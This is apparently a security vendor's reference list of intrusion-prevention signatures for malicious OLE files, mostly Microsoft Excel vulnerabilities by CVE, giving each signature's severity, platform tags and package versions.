About this situation: An attempt to exploit CVE-2012-0158
Context: OLE File Stream
Severity: 10
Tags: Windows, Any Hardware, MS2012-04, CVE2012, Windows not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-446-4219
Last changed: sgpkg-ips-466-5211
Vulnerability: Microsoft-ActiveX-Code-Execution-CVE-2012-0158
Description:
Back to top

File-OLE_Microsoft-DirectPlay-Heap-Overflow-Vulnerability

About this situation: A vulnerability in Microsoft DirectPlay
Context: OLE File Stream
Severity: 7
Tags: Windows XP, Windows 2003, Windows Vista, Windows 7, Windows 2008 R2, Windows 8, Windows 2012, Windows 2008, Any Hardware, MS2012-12, CVE2012, Windows XP not specific, Windows 2003 not specific, Windows Vista not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-497-5211
Last changed: sgpkg-ips-497-5211
Vulnerability: Microsoft-DirectPlay-Heap-Overflow-Vulnerability
Description:
Back to top

File-OLE_Microsoft-Equation-2.0-Document

About this situation: Microsoft Equation 2.0 download detected
Context: OLE File Stream
Severity: 2
Tags: Windows, Any Hardware, Microsoft Equation, Windows not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-623-5211
Last changed: sgpkg-ips-623-5211
Vulnerability: File-Type-Identification
Description:
Back to top

File-OLE_Microsoft-Equation-3.0-Document

About this situation: Microsoft Equation 3.0 download detected
Context: OLE File Stream
Severity: 2
Tags: Windows, Any Hardware, Microsoft Equation, Windows not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-623-5211
Last changed: sgpkg-ips-623-5211
Vulnerability: File-Type-Identification
Description:
Back to top

File-OLE_Microsoft-Excel-95-Workbook

About this situation: Microsoft Excel 95 workbook file download detected
Context: OLE File Stream
Severity: 2
Tags: Windows, Any Hardware, Microsoft Excel, Windows not specific, Microsoft Excel not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-622-5211
Last changed: sgpkg-ips-622-5211
Vulnerability: File-Type-Identification
Description:
Back to top

File-OLE_Microsoft-Excel-Array-Indexing-Vulnerability-CVE-2011-0978

About this situation: An attempt to exploit Excel vulnerability CVE-2011-0978
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Excel, MS2011-04, CVE2011, Windows not specific, Microsoft Excel not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1689-5242
Vulnerability: Microsoft-Excel-Array-Indexing-Vulnerability-CVE-2011-0978
Description:
Back to top

File-OLE_Microsoft-Excel-Array-Indexing-Vulnerability-CVE-2011-1990

About this situation: An attempt to exploit a vulnerability in Microsoft Excel detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Excel, MS2011-09, CVE2011, Windows not specific, Microsoft Excel not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-412-4219
Last changed: sgpkg-ips-1719-5242
Vulnerability: Microsoft-Excel-Array-Indexing-Vulnerability-CVE-2011-1990
Description:
Back to top

File-OLE_Microsoft-Excel-Axisparent-Record-Index-Handling-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Excel detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Mac OS X, Any Hardware, Microsoft Excel, Microsoft Excel Viewer, MS2008-08, CVE2008, Windows not specific, Microsoft Excel not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-460-5211
Vulnerability: Microsoft-Excel-Axisparent-Record-Index-Handling-Code-Execution
Description:
Back to top

File-OLE_Microsoft-Excel-Colinfo-Record-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Excel detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Excel, Microsoft Excel Viewer, Microsoft Office, Microsoft Works, MS2006-10, CVE2006, Windows not specific, Microsoft Excel not specific, Microsoft Office not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-415-4219
Last changed: sgpkg-ips-415-4219
Vulnerability: Microsoft-Excel-Colinfo-Record-Buffer-Overflow
Description:
Back to top

File-OLE_Microsoft-Excel-Column-Record-Handling-Memory-Corruption

About this situation: An attempt to exploit a memory corruption vulnerability in Microsoft Excel detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Mac OS, Any Hardware, Microsoft Excel, MS2007-01, CVE2007, Windows not specific, Mac OS not specific, Microsoft Excel not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-584-5211
Vulnerability: Microsoft-Excel-Column-Record-Handling-Memory-Corruption
Description:
Back to top

File-OLE_Microsoft-Excel-Conditional-Expression-Parsing-Vulnerability

About this situation: An attempt to exploit a vulnerability in Microsoft Office detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Excel, MS2011-09, CVE2011, Windows not specific, Microsoft Excel not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-412-4219
Last changed: sgpkg-ips-415-4219
Vulnerability: Microsoft-Excel-Conditional-Expression-Parsing-Vulnerability
Description:
Back to top

File-OLE_Microsoft-Excel-Conditional-Formatting-Values-Handling-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Excel detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Mac OS X, Any Hardware, Microsoft Excel, MS2008-03, CVE2008, Windows not specific, Microsoft Excel not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-460-5211
Vulnerability: Microsoft-Excel-Conditional-Formatting-Values-Handling-Code-Execution
Description:
Back to top

File-OLE_Microsoft-Excel-Continuefrt12-Record-Parsing-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Excel detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Excel, CVE2021, Windows not specific, Microsoft Excel not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1403-5242
Last changed: sgpkg-ips-1403-5242
Vulnerability: Microsoft-Excel-Continuefrt12-Record-Parsing-Heap-Buffer-Overflow
Description:
Back to top

File-OLE_Microsoft-Excel-Crafted-Picture-Record-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Excel detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Mac OS X, Any Hardware, Microsoft Excel, Microsoft Excel Viewer, MS2009-04, CVE2009, Windows not specific, Microsoft Excel not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Excel-Crafted-Picture-Record-Code-Execution
Description:
Back to top

File-OLE_Microsoft-Excel-Crafted-Url-Buffer-Overflow

About this situation: Detects malicious Microsoft Excel files with a crafted HLINK record
Context: OLE File Stream
Severity: 7
Tags: Windows, x86, Microsoft Excel, MS2006-08, CVE2006, Windows not specific, Microsoft Excel not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Excel-Crafted-Url-Buffer-Overflow
Description:
Back to top

File-OLE_Microsoft-Excel-Dangling-Pointer-Vulnerability-CVE-2011-0980

About this situation: An attempt to exploit Excel vulnerability CVE-2011-0980
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Excel, MS2011-04, CVE2011, Windows not specific, Microsoft Excel not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Excel-Dangling-Pointer-Vulnerability-CVE-2011-0980
Description:
Back to top

File-OLE_Microsoft-Excel-Data-Initialization-Vulnerability-CVE-2011-0105

About this situation: An attempt to exploit Excel vulnerability CVE-2011-0105
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Excel, MS2011-04, CVE2011, Windows not specific, Microsoft Excel not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Excel-Data-Initialization-Vulnerability-CVE-2011-0105
Description:
Back to top

File-OLE_Microsoft-Excel-Data-Validation-Record-Processing-Code-Execution

About this situation: An attempt to exploit a code execution vulnerability in Microsoft Excel detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Excel, MS2008-03, CVE2008, Windows not specific, Microsoft Excel not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: HTTP-Microsoft-Excel-Data-Validation-Record-Processing-Code-Execution
Description:
Back to top

File-OLE_Microsoft-Excel-DbOrParamQry-Record-Parsing-CVE-2010-0264

About this situation: An attempt to exploit a vulnerability in Microsoft Excel detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Excel 2002, Microsoft Excel 2004 for Mac, Microsoft Excel 2008 for Mac, MS2010-03, CVE2010, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Excel-DbOrParamQry-Record-Parsing-CVE-2010-0264
Description:
Back to top

File-OLE_Microsoft-Excel-Embedded-Flash-Object-JavaScript-Code-Execution

About this situation: Detects JavaScript code execution attempts via a Flash object in a crafted Excel file
Context: OLE File Stream
Severity: 7
Tags: Windows, x86, Microsoft Excel, MS2006-11, CVE2006, Windows not specific, Microsoft Excel not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Excel-Embedded-Shockwave-Flash-Object-Code-Execution
Description:
Back to top

File-OLE_Microsoft-Excel-ExternName-Record-Parsing-Buffer-Overflow-CVE-2010-1249

About this situation: A malicious Microsoft Excel document targeting CVE-2010-1249 over HTTP detected
Context: OLE File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft Office, MS2010-06, CVE2010, Any Operating System not specific, Microsoft Office not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Excel-ExternName-Record-Parsing-Buffer-Overflow-CVE-2010-1249
Description:
Back to top

File-OLE_Microsoft-Excel-File-Handling-Code-Execution-Vulnerability

About this situation: Detected an attempt to exploit memory corruption vulnerability in Microsoft Excel
Context: OLE File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft Excel, Microsoft Excel Viewer, MS2008-03, CVE2008, Any Operating System not specific, Microsoft Excel not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1652-5242
Vulnerability: Microsoft-Excel-File-Handling-Code-Execution-Vulnerability
Description:
Back to top

File-OLE_Microsoft-Excel-File-Parsing-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Excel detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Excel, Microsoft Office, MS2012-05, CVE2012, Windows not specific, Microsoft Excel not specific, Microsoft Office not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-454-4333
Last changed: sgpkg-ips-454-4333
Vulnerability: Microsoft-Excel-File-Parsing-Memory-Corruption
Description:
Back to top

File-OLE_Microsoft-Excel-FNGROUPNAME-Record-Uninitialized-Memory-CVE-2010-0262

About this situation: An attempt to exploit a vulnerability in Microsoft Excel detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Excel 2007, Microsoft Excel 2004 for Mac, MS2010-03, CVE2010, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-456-5211
Vulnerability: Microsoft-Excel-FNGROUPNAME-Record-Uninitialized-Memory-CVE-2010-0262
Description:
Back to top

File-OLE_Microsoft-Excel-For-Asian-Languages-Style-Handling-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Excel detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Excel, Microsoft Excel Viewer, Microsoft Office, MS2006-10, CVE2006, Windows not specific, Microsoft Excel not specific, Microsoft Office not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-414-4219
Last changed: sgpkg-ips-1689-5242
Vulnerability: Microsoft-Excel-For-Asian-Languages-Style-Handling-Buffer-Overflow
Description:
Back to top

File-OLE_Microsoft-Excel-Format-Record-Array-Index-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Excel detected
Context: OLE File Stream
Severity: 2
Tags: Windows, Any Hardware, Microsoft Excel, Microsoft Office, MS2008-08, CVE2008, Windows not specific, Microsoft Excel not specific, Microsoft Office not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-548-5211
Last changed: sgpkg-ips-553-5211
Vulnerability: Microsoft-Excel-Format-Record-Array-Index-Memory-Corruption
Description:
Back to top

File-OLE_Microsoft-Excel-Frtwrapper-Record-Buffer-Overflow

About this situation: An attempt to exploit a buffer overflow vulnerability in Microsoft Excel detected
Context: OLE File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft Excel, Microsoft Excel Viewer, MS2008-10, CVE2008, Any Operating System not specific, Microsoft Excel not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Excel-Frtwrapper-Record-Buffer-Overflow
Description:
Back to top

File-OLE_Microsoft-Excel-Graphic-Object-Deref-Vulnerability-CVE-2011-0977

About this situation: An attempt to exploit Microsoft Excel vulnerability CVE-2011-0977
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Excel, MS2011-04, CVE2011, Windows not specific, Microsoft Excel not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1733-5242
Vulnerability: Microsoft-Excel-Graphic-Object-Deref-Vulnerability-CVE-2011-0977
Microsoft-Excel-Office-Drawing-Layer-Remote-Code-Execution
Description:
Back to top

File-OLE_Microsoft-Excel-Heap-Overflow-Vulnerability-CVE-2011-0098

About this situation: An attempt to exploit Excel vulnerability CVE-2011-0098
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Excel, MS2011-04, CVE2011, Windows not specific, Microsoft Excel not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1661-5242
Vulnerability: Microsoft-Excel-Heap-Overflow-Vulnerability-CVE-2011-0098
Description: CVE References: CVE-2011-0098
Back to top

File-OLE_Microsoft-Excel-Improper-Record-Parsing-Vulnerability-CVE-2011-1273

About this situation: An attempt to exploit a vulnerability in Microsoft Excel detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Excel, MS2011-06, CVE2011, Windows not specific, Microsoft Excel not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Excel-Improper-Record-Parsing-Vulnerability-CVE-2011-1273
Description:
Back to top

File-OLE_Microsoft-Excel-Integer-Overrun-Vulnerability-CVE-2011-0097

About this situation: An attempt to exploit Excel vulnerability CVE-2011-0097
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Excel, MS2011-04, CVE2011, Windows not specific, Microsoft Excel not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Excel-Integer-Overrun-Vulnerability-CVE-2011-0097
Description:
Back to top

File-OLE_Microsoft-Excel-Malformed-Filter-Records-Handling-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Excel detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Excel, Microsoft Excel Viewer, Microsoft Office, MS2007-05, CVE2007, Windows not specific, Microsoft Excel not specific, Microsoft Office not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-414-4219
Last changed: sgpkg-ips-455-5211
Vulnerability: Microsoft-Excel-Malformed-Filter-Records-Handling-Code-Execution
Description:
Back to top

File-OLE_Microsoft-Excel-Malformed-Fngroupcount-Value-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Excel detected
Context: OLE File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft Excel, Microsoft Excel Viewer, Microsoft Office, MS2006-03, MS2006-07, CVE2006, Any Operating System not specific, Microsoft Excel not specific, Microsoft Office not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-414-4219
Last changed: sgpkg-ips-1837-5242
Vulnerability: Microsoft-Excel-Malformed-Fngroupcount-Value-Code-Execution
Microsoft-Excel-Malformed-Record-Code-Execution
Description:
Back to top

File-OLE_Microsoft-Excel-Malformed-Formula-Parsing-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Excel detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Excel, Microsoft Excel Viewer, Microsoft Office, Microsoft Office Compatibility Pack, MS2008-03, CVE2008, Windows not specific, Microsoft Excel not specific, Microsoft Office not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Excel-Malformed-Formula-Parsing-Code-Execution
Description:
Back to top

File-OLE_Microsoft-Excel-Malformed-Imdata-Record

About this situation: An attempt to exploit a vulnerability in Microsoft Excel detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Mac OS X, Any Hardware, Microsoft Excel, MS2007-01, CVE2007, Windows not specific, Microsoft Excel not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Excel-Malformed-Imdata-Record
Description:
Back to top

File-OLE_Microsoft-Excel-Malformed-Palette-Record-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Excel detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Mac OS, Any Hardware, Microsoft Excel, Microsoft Excel Viewer, MS2007-01, CVE2007, Windows not specific, Mac OS not specific, Microsoft Excel not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Excel-Malformed-Palette-Record-Memory-Corruption
Description:
Back to top

File-OLE_Microsoft-Excel-Malformed-Record-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Office detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Excel, MS2009-06, CVE2009, Windows not specific, Microsoft Excel not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Office-Excel-Malformed-Record-Memory-Corruption
Description:
Back to top

File-OLE_Microsoft-Excel-Malformed-Selection-Record-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Excel detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Excel, Microsoft Excel Viewer, Microsoft Office, MS2006-07, CVE2006, Windows not specific, Microsoft Excel not specific, Microsoft Office not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-416-4219
Last changed: sgpkg-ips-1346-5242
Vulnerability: Microsoft-Excel-Malformed-Selection-Record-Code-Execution
Description:
Back to top

File-OLE_Microsoft-Excel-MDXSET-Record-Heap-Overflow-CVE-2010-0261

About this situation: An attempt to exploit a vulnerability in Microsoft Excel detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Excel 2007, MS2010-03, CVE2010, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Excel-MDXSET-Record-Heap-Overflow-CVE-2010-0261
Description:
Back to top

File-OLE_Microsoft-Excel-MDXTUPLE-Record-Heap-Overflow-CVE-2010-0260

About this situation: An attempt to exploit a vulnerability in Microsoft Excel detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Excel Viewer, Microsoft Excel 2007, MS2010-03, CVE2010, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Excel-MDXTUPLE-Record-Heap-Overflow-CVE-2010-0260
Description:
Back to top

File-OLE_Microsoft-Excel-Memory-Corruption-CVE-2012-1886

About this situation: Detected attempt to exploit a vulnerability in Microsoft Excel
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Excel 2003, Microsoft Excel 2007, Microsoft Office Compatibility Pack, Microsoft Excel 2010, MS2012-11, CVE2012, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-491-5211
Last changed: sgpkg-ips-1661-5242
Vulnerability: Microsoft-Excel-Memory-Corruption-CVE-2012-1886
Description:
Back to top

File-OLE_Microsoft-Excel-Memory-Heap-Overwrite-Vulnerability-CVE-2011-1275

About this situation: An attempt to exploit a vulnerability in Microsoft Excel detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Excel, MS2011-06, CVE2011, Windows not specific, Microsoft Excel not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1652-5242
Vulnerability: Microsoft-Excel-Memory-Heap-Overwrite-Vulnerability-CVE-2011-1275
Description:
Back to top

File-OLE_Microsoft-Excel-Merge-Cell-Record-Pointer-CVE-2010-3237

About this situation: Detected attempt to exploit a vulnerability in Microsoft Excel
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Excel 2002, Microsoft Excel 2004 for Mac, MS2010-10, CVE2010, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1346-5242
Vulnerability: Microsoft-Excel-Merge-Cell-Record-Pointer-CVE-2010-3237
Description:
Back to top

File-OLE_Microsoft-Excel-MergeCells-Record-Heap-Overflow-Vulnerability

About this situation: An attempt to exploit a vulnerability in Microsoft Excel detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Excel, MS2012-05, CVE2012, Windows not specific, Microsoft Excel not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-451-4333
Last changed: sgpkg-ips-1689-5242
Vulnerability: Microsoft-Excel-MergeCells-Record-Heap-Overflow-Vulnerability
Description:
Back to top

File-OLE_Microsoft-Excel-Name-Record-Array-Indexing-Stack-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Excel detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Excel, Microsoft Excel Viewer, Microsoft Office, Microsoft Open XML File Format Converter, MS2008-12, CVE2008, Windows not specific, Microsoft Excel not specific, Microsoft Office not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Excel-Name-Record-Array-Indexing-Stack-Corruption
Description:
Back to top

File-OLE_Microsoft-Excel-Named-Graph-Record-Parsing-Stack-Overflow

About this situation: Attempt to exploit stack overflow vulnerability in Microsoft Excel detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Excel, Microsoft Excel Viewer, MS2007-05, CVE2007, Windows not specific, Microsoft Excel not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-460-5211
Vulnerability: Microsoft-Excel-Biff-File-Format-Named-Graph-Record-Parsing-Stack-Overflow
Description:
Back to top

File-OLE_Microsoft-Excel-Note-Record-Information-Disclosure-CVE-2018-8382

About this situation: An attempt to exploit a vulnerability in Microsoft Excel detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Excel, CVE2018, Windows not specific, Microsoft Excel not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1774-5242
Last changed: sgpkg-ips-1774-5242
Vulnerability: Microsoft-Excel-Note-Record-Information-Disclosure-CVE-2018-8382
Description:
Back to top

File-OLE_Microsoft-Excel-OBJECTLINK-Memory-Corruption-Vulnerability

About this situation: An attempt to exploit a vulnerability in Microsoft Excel detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Excel, MS2012-05, CVE2012, Windows not specific, Microsoft Excel not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-451-4333
Last changed: sgpkg-ips-1689-5242
Vulnerability: Microsoft-Excel-OBJECTLINK-Memory-Corruption-Vulnerability
Description:
Back to top

File-OLE_Microsoft-Excel-Out-Of-Bounds-Array-Access-Vulnerability-CVE-2011-1274

About this situation: An attempt to exploit a vulnerability in Microsoft Excel detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Excel, MS2011-06, CVE2011, Windows not specific, Microsoft Excel not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Excel-Out-Of-Bounds-Array-Access-Vulnerability-CVE-2011-1274
Description:
Back to top

File-OLE_Microsoft-Excel-Out-Of-Bounds-Array-Indexing-Vulnerability

About this situation: An attempt to exploit a vulnerability in Microsoft Office detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Excel, MS2011-09, CVE2011, Windows not specific, Microsoft Excel not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-412-4219
Last changed: sgpkg-ips-412-4219
Vulnerability: Microsoft-Excel-Out-Of-Bounds-Array-Indexing-Vulnerability
Description:
Back to top

File-OLE_Microsoft-Excel-Parsed-Expression-Information-Disclosure-CVE-2018-8246

About this situation: An attempt to exploit a vulnerability in Microsoft Excel detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Excel, CVE2018, Windows not specific, Microsoft Excel not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1774-5242
Last changed: sgpkg-ips-1774-5242
Vulnerability: Microsoft-Excel-Parsed-Expression-Information-Disclosure-CVE-2018-8246
Description: CVE References: CVE-2018-8246
Back to top

File-OLE_Microsoft-Excel-Ptgextraarray-Parsing-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Excel detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Excel, Microsoft Office, MS2010-10, CVE2010, Windows not specific, Microsoft Excel not specific, Microsoft Office not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1663-5242
Vulnerability: Microsoft-Excel-Ptgextraarray-Parsing-Memory-Corruption
Description:
Back to top

File-OLE_Microsoft-Excel-Real-Time-Data-Array-Record-CVE-2010-3240

About this situation: Detected attempt to exploit a vulnerability in Microsoft Excel
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Excel Viewer, Microsoft Excel 2002, Microsoft Excel 2007, MS2010-10, CVE2010, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Excel-Real-Time-Data-Array-Record-CVE-2010-3240
Description:
Back to top

File-OLE_Microsoft-Excel-Record-Memory-Corruption-CVE-2010-0257

About this situation: An attempt to exploit a vulnerability in Microsoft Excel detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Excel 2002, MS2010-03, CVE2010, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Excel-Record-Memory-Corruption-CVE-2010-0257
Description:
Back to top

File-OLE_Microsoft-Excel-Record-Memory-Corruption-CVE-2011-3403

About this situation: An attempt to exploit a vulnerability in Microsoft Excel detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Excel, MS2011-12, CVE2011, Windows not specific, Microsoft Excel not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-428-4219
Last changed: sgpkg-ips-456-5211
Vulnerability: Microsoft-Excel-Record-Memory-Corruption-CVE-2011-3403
Description:
Back to top

File-OLE_Microsoft-Excel-Record-Parsing-Integer-Overflow-CVE-2010-3230

About this situation: Detected attempt to exploit a vulnerability in Microsoft Excel
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Excel 2002, MS2010-10, CVE2010, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Excel-Record-Parsing-Integer-Overflow-CVE-2010-3230
Description:
Back to top

File-OLE_Microsoft-Excel-Record-Parsing-WriteAV-Vulnerability-CVE-2011-0101

